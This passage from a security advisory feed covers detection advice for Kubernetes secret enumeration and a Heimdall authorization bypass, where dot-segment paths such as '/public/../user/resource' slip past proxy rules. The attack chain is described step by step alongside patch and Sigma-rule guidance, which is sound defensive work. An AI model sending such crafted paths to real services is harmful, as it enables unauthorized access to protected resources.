<p>Successful enumeration of Kubernetes secrets can lead to the compromise of sensitive credentials, allowing attackers to gain unauthorized access to critical systems and data. This can result in data breaches, service disruptions, and significant financial losses. The targeting of <code>kube-system</code> and <code>default</code> namespaces poses a particularly high risk due to the presence of core system components and sensitive configurations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Kubernetes Secrets List in Sensitive Namespaces</code> to your SIEM to detect suspicious secret enumeration activities based on <code>kubernetes.audit.requestURI</code>.</li>
<li>Monitor Kubernetes audit logs (<code>logs-kubernetes.audit_logs-*</code>) for <code>list</code> operations on the <code>secrets</code> resource, specifically targeting <code>/api/v1/secrets</code> and sensitive namespaces.</li>
<li>Implement network policies to restrict access to the Kubernetes API server from untrusted networks.</li>
<li>Review and harden the security configuration of the <code>kube-system</code> and <code>default</code> namespaces.</li>
<li>Enforce the principle of least privilege for service accounts and user access to minimize the impact of credential compromise.</li>
<li>Investigate any alerts generated by the Sigma rule and correlate with other security events to identify potential attacks.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubernetes</category><category>credential-access</category><category>discovery</category><category>cloud</category></item><item><title>Heimdall Authorization Bypass via Path Normalization Mismatch</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-heimdall-auth-bypass/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-heimdall-auth-bypass/</guid><description>Heimdall is vulnerable to an authorization bypass due to a path normalization mismatch between Heimdall and downstream components, potentially leading to unauthorized access and privilege escalation.</description><content:encoded><![CDATA[<p>Heimdall, a cloud-native security proxy, is susceptible to an authorization bypass vulnerability. This issue arises from a discrepancy in how Heimdall handles request paths compared to downstream components. Specifically, Heimdall performs rule matching on the raw, non-normalized request path, while downstream components might normalize dot-segments (e.g., <code>/user/../admin</code>) according to RFC 3986. This can lead to Heimdall authorizing a request based on the raw path, whereas the downstream service processes a different, normalized path, potentially bypassing intended access controls. The vulnerability affects Heimdall versions prior to 0.17.14. Exploitation is possible when using wildcards in rule matching without further constraints. This could allow attackers to access restricted resources or functionalities.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious HTTP request with a path containing dot-segments (e.g., <code>/public/../user/resource</code>).</li>
<li>The request is sent to the Heimdall proxy.</li>
<li>Heimdall performs rule matching on the raw, non-normalized path (<code>/public/../user/resource</code>).</li>
<li>Heimdall incorrectly matches the request to a less restrictive rule, such as a rule for <code>/public/**</code>, due to the initial <code>/public</code> segment.</li>
<li>Heimdall authorizes the request based on the matched rule, potentially allowing anonymous access.</li>
<li>The request is forwarded to the downstream service.</li>
<li>The downstream service normalizes the request path to <code>/user/resource</code>.</li>
<li>The downstream service processes the request as <code>/user/resource</code>, bypassing the intended access controls for that resource, possibly leading to data access or privilege escalation.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to bypass access control policies enforced by Heimdall. This can lead to unauthorized access to sensitive data, modification of restricted data, invocation of privileged functionality without proper authentication or authorization, and in certain configurations, escalation of privileges. The number of potential victims depends on the deployment and configuration of Heimdall within affected environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the available patch to upgrade Heimdall to version 0.17.14 or later to remediate the vulnerability.</li>
<li>Implement HTTP path normalization or rejection of HTTP paths containing relative path expressions in layers in front of Heimdall, as suggested in the advisory.</li>
<li>Deploy the Sigma rule provided below to detect suspicious HTTP requests containing dot-segments (..) in the request path.</li>
<li>Configure your proxies (e.g., Envoy) to normalize paths, as described in the advisory.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>authorization-bypass</category><category>path-normalization</category><category>cloud</category></item></channel></rss>